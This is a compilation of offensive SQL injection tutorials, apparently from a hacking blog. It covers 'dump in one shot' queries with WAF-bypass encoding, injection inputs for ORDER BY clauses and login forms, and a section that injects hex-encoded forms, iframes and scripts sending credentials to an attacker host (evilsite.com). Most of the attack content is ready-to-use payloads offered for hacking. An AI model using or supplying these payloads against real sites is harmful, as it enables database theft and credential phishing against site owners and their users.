DIOS the SQL Injectors Weapon (Upgraded)

DIOS the SQL Injectors Weapon (Upgraded)

Starting on the name of My god "Allah" the most beneficent the most merciful

This time i wont take much of your time as its not a Tutorial on DIOS and if you want then you can visit.

http://securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-1.html
http://securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-2.html

In this Post we will only know DIOS a little more and introduce some different and new flavors of DIOS.

USAGE FOR ALL DIOS: Just put the code in place of vulnerable column and see the magic

As most of you have seen this one the first DIOS

(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
::POC::

Above is a Awesome Piece of code made by Profexer a Russian hacker

Below we can see another DIOS BY Dr.Z3r0

(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
::POC::

The Next DIOS you can use when any WAF is really fucking you by blocking concat, then herez the solution made by my friend M@dBl00d.

(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
::POC::

Now the next DIOS by me, again the same thing it saves your ass from WAF by avoiding concat secondly it allows you to add upto 9 columns without any modification and probably be the shortest DIOS.

make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
::POC::

DIOS (Dump in One Shot) Explained Part 2

Starting on the name of My god "Allah" the most beneficent the most merciful

In this tutorial we will continue our discussion on DIOS if you dint read DIOS Part I then i will prefer you to first read that to understand the basics of DIOS and then come to this one. In our Last tutorial we discussed how user can extract all databases, Tables and then columns together using One query, then we played with some basic conditions while extracting. In this tutorial i will concentrate on how we can get a better output. We will extract the database name, tablename, Columns in that table and then we will also play with some indenxing. In the end of this tutorial we will be targetting a out like this :

 
First of all lets start with our Base Query where we left in the first tutorial. Extracting the Database name, Table Name and Column Names from all the databases other than information_schema.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns) 
where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,table_schema,' :: ',table_name,' :: ',column_name))))a)

As you can see the condition over there is table_schema!='information_schema' which means only tables from tables and columns of information_schema wont show. You can test the above query here.

But as we can see that the we are getting database name and table name in each row. So now we will add up a condition that will only write the database and table name when it changes. 

(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) 
where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,'
',column_name), (column_name))))))a)

You can test the above Query here. So the above query we can see a green part which is the declaration of @tbl variable then the red part which is our IF condition. The basic syntax of if is IF(,(do if condition is True),(do if condition is False)). So above you can see (@tbl!=table_name) is the condition which checks if the @tbl is not equals to the current table name, which means each time the tablename will be changed it will be true, now lets see what will happen when the condition is true: "Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,'<br>',column_name)" Here we are printing the Database Name, Table Name and Column name if the condition is true. If the condition is false we are only printing columnname which is clear enough "(column_name)". Now lets move to our Next tast which is printing the Number of rows in each table, and that we have to print each time the table name is getting printed, which means we will include it inside the true part.

(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')
',column_name), (column_name))))))a)

You can test the above Query here. In the green part you can see we again declared one more variable (@tbl_sc:=0x00) and then we saved table_schema into this variable @tbl_sc:=table_schema, so now we have two variables @tbl and tbl_ch now we can easily extract the rows for each table using them. To extract the rows we used the red part which is (select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl). If you know basic SQL then you can easily understand this query. Now tha last part is adding a count in front of each table name.

(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')<br>',column_name), (column_name))))))a)

You can test the above Query here. Now we can see in the green part we declared a variable @num and initialised it with 0. Then in the red part which is under the true condition where table names are getting printed we are printing the variable and adding 1 each time its printed. So here we are done with the complete DIOS query. Now lets make add some WAF bypass and some other basic DB related information to make it more usable. 

(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345%73elect*/(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345`%69nformation_%73chema`.`%63olumns`*/)%77here (`%74able_schema`!=/*!12345'%69nformation_schema'*/)and(0x00)in(@a:=%63oncat%0a(@a,0x3c62723e,if( (@tbl!=/*!12345`table_name`*/), %43oncat%0a(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=`table_schema`,0x203a3a20,@tbl:=`%74able_name`,0x2028526f777320,(/*!12345%73elect*/`table_rows`from/*!12345`%69nformation_schema`.`tables`*/where table_schema=@tbl_sc and/*!12345`%74able_name`*/=@tbl),0x293c62723e,/*!12345`%63olumn_name`*/), (/*!12345`%63olumn_name`*/))))))a)

you can test the above query here. In the Above query we just added some basic WAF bypass and then added encoded all strings to hex. WAF bypassing will be explained later in our WAF bypass Series. Now the last part adding some other HTML, Our name, Database Name, Version etc in our query using concat.

COncaT%0a(0x3c62723e3c62723e3c2f63656e7465723e3c2f6469763e3c2f6469763e3c2f7461626c653e496e6a3363743364206279205a656e3c62723e3c666f6e7420636f6c6f723d677265656e3e56657273696f6e203a3c2f666f6e743e20,version(),0x3c62723e3c666f6e7420636f6c6f723d677265656e3e4461746162617365203c2f666f6e743e3a20,database(),0x3c62723e3c666f6e7420636f6c6f723d677265656e3e55736572203c2f666f6e743e3a,user(),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345%73elect*/(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345`%69nformation_%73chema`.`%63olumns`*/)%77here (`%74able_schema`!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@a:=%63oncat%0a(@a,0x3c62723e,if( (@tbl!=/*!12345`table_name`*/), %43oncat%0a(0x3c2f666f6e743e3c666f6e7420636f6c6f723d477265656e3e3c62723e,@num:=(@num%2b1),0x29203c666f6e7420636f6c6f723d2723463746453245273e204461746162617365203a20,@tbl_sc:=`table_schema`,0x205b205461626c65204e616d65203a20,@tbl:=`%74able_name`,0x5d2028526f777320,(/*!12345%73elect*/`table_rows`from/*!12345`%69nformation_schema`.`tables`*/where table_schema=@tbl_sc and/*!12345`%74able_name`*/=@tbl),0x293c666f6e7420636f6c6f723d7265643e3c62723e,/*!12345`%63olumn_name`*/),concat%0a(/*!12345`%63olumn_name`*/))))))a))

You can test the query here. Here is our final query. That is manimum we can get from it, but still some guys use to Number the columns also. But i am not going to explain that over here. If you understood how we made to this query,then you can easily make that one also. 
I hope you enjoyed reading. Leave your valueable comments and feedback please.

Happy hacking with 1n51d3H4ck3r1337.
 

DIOS (Dump in One Shot) Explained

DIOS (Dump in One Shot) Explained

Starting on the name of My god "Allah" the most beneficent the most merciful

I dont know if there is an explanation for DIOS already or is it explained in a more better way than the way i am going to expain but i know many of the injectors are searching for it, and even i am getting many requests to write a explanation on DIOS. So here lets start understanding DIOS and how it actually works. We will first make it easy and small then move step by step to complex ones. To understand DIOS you have to read the tutorial atleast twice with full concentration. If you think you will see it step by step and you will understand it easily then you are wrong and at the wrong place. So if you really want to understand then read it carefully.

Here is a Basic Query which gives us all the databases

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a)

The above given query will give us all the databases in one shot. So let us try and understand how it actually works, for that we have to first understand the red colored part of the query. But before that we have to understand the use of in clause in a SQL statement.

select * from tablename where name in ('inj3ct0r','Zenodermus','Security','Idiots')

The Above statement specify to extract all the records from table where the name value is either 'inj3ct0r' or 'Zenodermus' or 'Security' or 'Idiots' which can also be written in another way by using OR as given below. 

select * from tablename where name='inj3ct0r' or name='Zenodermus' or name='Security' or name='Idiots';

Output for both the statements will be same. So now lets move back to DIOS there we can see the innermost statemet which is

(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>')))

Here whats happening is we are select a variable @a from information_schema.schemata and then we are concatenating all the schema names in the 'IN' clause. So what will actually happen is that all the schema names will come in 'IN' caluse and will get selected as they all exist in the table information_schema.schemata. As we can see above in the red part @a is concatenated with itself within a loop, each time "@a,schema_name,'<br>'" will be added to @a. Now lets see the rest part.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in ((@a:=concat(@a,schema_name,'<br>'))))a)

Now i guess you can understand we are selecting that concatenated variable @a in the first statement. Now lets move to our next query which gives us all the table names in one shot. One more thing the reason we use this query is because group_concat do not allow characters more than 1024, so in that case we can not extract much data from it. there are some other bypass for 1024 character limitation which is discussed over here at Death Row Injection. 

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where (@a)in (@a:=concat(@a,table_name,'<br>'))))a)

The above query will give us all the table names in the same manner we got the database names, but this time we need to add a condition to remove all the tables which belongs to information_schema, below is the query for that. 

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_name,'<br>'))))a)

Now the Query is giving us all the table names discluding the tables from information_schema. But again a problem is there that we can not see which table belongs to which database so we can also include table_schema each time while concatination.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,0x3a,table_name,'<br>'))))a)

Now we got all the Database Names and the table names, but we have a better option to get all the database names, table names and the Column names together by using information_schema.columns table. 

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

Now lets take a common challenge which gets posted to extract all the table names which are starting with 'shit_', so in that case we can use add up another condition as the below query shows. 

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and table_name like 'shit_%' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

In this manner we can get whatever output we want from DIOS. Some more complicated queries will be discussed in next part of DIOS explanataion.

Group By and Order by SQL injection

Group By and Order by SQL injection

Hello I hope you enjoyed reading our SQL Injection tutorials. In this tutorial we will discuss how we can inject when the point of injection is order by clause or group by clause.

First of all i will start with order by injection because injecting into group by queries is really simple and simple union based injection can be used when we are injecting in order by clause.

There are Three ways we are going to discuss how to inject into order by clause.
1. Error Based Injection
2. Error Based Blind Injection
3. Time Based Blind Techniques.

Exploitation using XPATH injection.

Query:

select posts from content where submit=1 order by $sort

Injection

input : 1,extractvalue(0x0a,concat(0x0a,(select database())))#
input : 1,extractvalue(0x0a,concat(0x0a,(select database())))--
input : 1,extractvalue(0x0a,concat(0x0a,(select database())))--+

The above query will output the data in form of error. for rest of Exploitation using XPATH read XPATH Injection

select posts from content where submit=1 order by `$sort`

In such cases you will see the column name in the parameter so just close that first and then inject

input : id`,extractvalue(0x0a,concat(0x0a,(select database())))#
input : id`,extractvalue(0x0a,concat(0x0a,(select database())))--
input : id`,extractvalue(0x0a,concat(0x0a,(select database())))--+

The above query will output the data in form of error. for rest of Exploitation using XPATH read XPATH Injection

Error Based Blind Injection

This is the case when you can not see any direct error from database. So in such cases we create the error ourselves and by the behaviour like no output or some other kind of error we can know that its a Error. Now below is a query i created in such a manner that if the output is true only then it will create error else it will work. By looking at the page we will come to know is it true or false. 

select posts from content where submit=1 order by `$sort`

In such cases you will see the column name in the parameter so just close that first and then inject

Injections

input : id`,extractvalue(null,concat((select 0 from dual where database() like database()),0x3a))--+
input : id`,extractvalue(null,concat((select 0 from dual where database() like database()),0x3a))--
input : id`,extractvalue(null,concat((select 0 from dual where database() like database()),0x3a))#

Here you can see the condition database() like database() here you can use any condition to test, and other blind injections syntax will also work over here. You can use it to extract the database using blind injection.

select posts from content where submit=1 order by `$sort`

Remember when you will try to create an error over here it will show unknown column error its not different from the above one which we injected using XPATH, but the same can be injected using the below injection which can be used in cases when XPATH functions are not available of disabled.

Injection Syntax

Injections

input : id`,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1--+
input : id`,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1--
input : id`,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1#

Here you can see the condition 1=1 here you can use any condition to test, and other blind injections syntax will also work over here. You can use it to extract the database using blind injection.


For rest of Exploitation you can use Blind Injection.

Exploitation using Time Based Blind Techniques.

Some times you could face a condition where both true and false are not having any difference or the page is redirected somewhere. In such case it becomes tough to use Blind Injection. What we will do now is create query in such a way that it will delay if its true else reply normally.
Query:

select posts from content where submit=1 order by `$sort`

Injection

input : id`,(select sleep(10) from dual where database() like database())#
input : id`,(select sleep(10) from dual where database() like database())--
input : id`,(select sleep(10) from dual where database() like database())--+

The above query will Reply normally if the condition is false otherwise it will take time to reply and this is how we will extract the data. for rest of Exploitation using Time based Blind read Time Based Blind Injection

Dumping Database From Login Form

Dumping Database From Login Form

Hello I hope you enjoyed reading Basic Injection and Login Form Bypass etc. So its time to move on to how can someone dump out the database of a vulnerable Login Form.

 Well the Trick is already discussed in earlier tutorials knowledge of those injections deeply is just enough to collect data from Login form. But just for a purpose of Tutorial and to open your mind towards this exploitation we are here discussing how to collect data from Login Form.

First of all there are Three ways of Achieving data from Login Forms.
1. Xpath Injection
2. Sub Query Injection
3. Blind Injection Both Techniques.

I strongly Suggest you to read them all as over here i wont be discussing in detail all these injections. As here we will discuss only some minor change in the injection and other things will remain same.

Same like Bypassing Login Form with SQL injection we will take a vulnerable Login script, and start exploring it.

Example:

$uname=$_POST['uname'];
$passwrd=$_POST['passwrd'];
$query="select username,pass from users where username='$uname' and password='$passwrd' limit 0,1";
$result=mysql_query($query);
$rows = mysql_fetch_array($result);
if($rows)
{
echo "You have Logged in successfully" ;
create_session();
}
else  
{
Echo "Better Luck Next time";
}

Exploitation using XPATH injection.

Query:

select username,pass from users where username='$uname' and password='$passwrd' limit 0,1

Injection

username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) and ''='
username : " or extractvalue(0x0a,concat(0x0a,(select database()))) and ""="
username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) --+
username : " or extractvalue(0x0a,concat(0x0a,(select database()))) --+
username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) #
username : " or extractvalue(0x0a,concat(0x0a,(select database()))) #
username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) --
username : " or extractvalue(0x0a,concat(0x0a,(select database()))) --

you can leave the password field empty. If the Page is actually vulnerable then surely one of the above will work and we will continue with that. Now lets see what will the query passed. For the above given Query first injection will work.

select username,pass from users where username='' or extractvalue(0x0a,concat(0x0a,(select database()))) and ''='' and password='' limit 0,1

So actually the above query will output the data in form of error. for rest of Exploitation using XPATH read XPATH Injection

Exploitation using Sub-Query Injection.

select username,pass from users where username="$uname" and password="$passwrd" limit 0,1
select username,pass from users where username='$uname' and password='$passwrd' limit 0,1

Injections

username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ""="
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --
username : " (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --

you can again leave the password field empty. If the Page is actually vulnerable then surely one of the above will work and we will continue with that. Now lets see what will the query passed. For the above given Query first injection will work.

select username,pass from users where username='' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='' and password='' limit 0,1

So actually the above query will output the data in form of error. for rest of Exploitation using Sub Query Injection.

Exploitation using Blind Injection

okay now as its blind we will again ask questions from the database if it allow us to login that means the answer is true or else its false.

okay first we need to find the right bypass string to know what query is being used inside the application. You can read the Login Bypass Tutorial to understand about it more. okay let us say we found that following injection is working and it allows us to bypass login.

" or true--

okay that means we are commenting out the rest of query

let us start by checking the length of database().
Quering if the length of database() is equal to 10

username = ' or (select 1 from dual where length(database())=10)--

if it allows you to login that means it says yes, if it don't allow you to login then you can try checking other number and you can always use the greater and smaller than symbols to make the process faster.

Once you know the length of database() you can start collecting information by testing like Blind Injection. Read Blind SQL injection or rest of the Exploitation.

URL Spoofed Phishing using SQLi

URL Spoofed Phishing using SQLi

Welcome to my yet another tutorial related to SQLi, this time as the title say it all we are going to do phishing with URL spoofing using SQL injection vulnerabilty. For those who have not read the basics of SQL injection i suggest you to go and read N00bz guide to SQL injection.

If you are new to phishing i let me explain, phishing is a attack where an attacker fool the user to enter his secret credentials which are sent to him using any specially crafted page or application etc.

The Concept:

We are going to inject our payload into the SQL injection and add some extra code to the webpage just as we did in XSS. If you have not read XSS with SQL Injection Tutorial then read that for a better understanding.

Approaches we can use to Achieve it.

1. Finding the Vulnrability.
2. Preparing the Injectable Query.
3. Inject HTML Coded form into Website (For n00bz like me)
4. Injection Iframe into the Website
5. Redirect user to Your Fake Page (URL will be changed)
6. Inject a javascript to change Current Login Form (For l33ts like my Freind d3c0mp!l3R)

Finding the Vulnerability, Preparing the Injectable query all goes in the Basic SQL injection. Read them before you continue.

I suppose you have read them all.

So lets continue

3. Inject HTML Coded form into Website

I assume you read the above tutorials so we can for example take a website and lets say the 3rd column gets printed on the webpage as output. So we will inject our payload into it. To make things simple we will encode our payload into hex. 

Our Payload

<form action=http://evilsite.com/get_it.php method="POST">
Username : <input type="text" name="username"><br>
Password :<input type="text" name="password">
<input type="submit">
</form>
<iframe height=0 width=0>

Hex Encoded value:

0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e

Injecting our payload:

http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e,4--

The above url will output the our payload into the Website. And the user will see a form into the website, in which if he login the credentials will be sent to the Attacker.

4. Injection Iframe into the Website

This time we will inject an iframe in the website which makes the payload small and we can make the login look much better in this way.

Our Payload

<br><iframe src="http://www.evilsite.com/fakepage.php" height=300 width=300 frameBorder="0" scrolling="no"></iframe>

Hex Encoded value

0x3c62723e3c696672616d65207372633d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e

Injecting our payload:

http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c62723e3c696672616d65207372633d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4--

The above url will output the our payload into the Website. And the user will see a form into the website, in which if he login the credentials will be sent to the Attacker.

5. Redirect user to Your Fake Page

This time we will inject javascript in the website which will redirect the user to our fakepage.

Our Payload

<script>window.location.href="http://www.evilsite.com/fakepage.php"</script>

Hex Encoded value

0x3c7363726970743e77696e646f772e6c6f636174696f6e2e687265663d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e

Injecting our payload:

http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c7363726970743e77696e646f772e6c6f636174696f6e2e687265663d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e,4--

The above url will inject the javascript into the page which will redirect user to our fakepage, in which if he login the credentials will be sent to the Attacker. The drawback it have is the URL spoofing part. Which we will cover in the next attack.

6. Inject a javascript to change Current Login Form

In this attack we will inject javascript in the website which will change the action of current login page in the site to our fake login page link.

Our Payload

<script>document.getElementsByTagName("form")[0].action="http://www.evilsite.com/fakepage.php"</script>

Hex Encoded value

0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e

Injecting our payload:

http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e,4--

The above url will inject the javascript into the page which will send the users credentials logged into real page to our fakepage.

Enjoy Hacking with 1n51d3H4ck3r1337.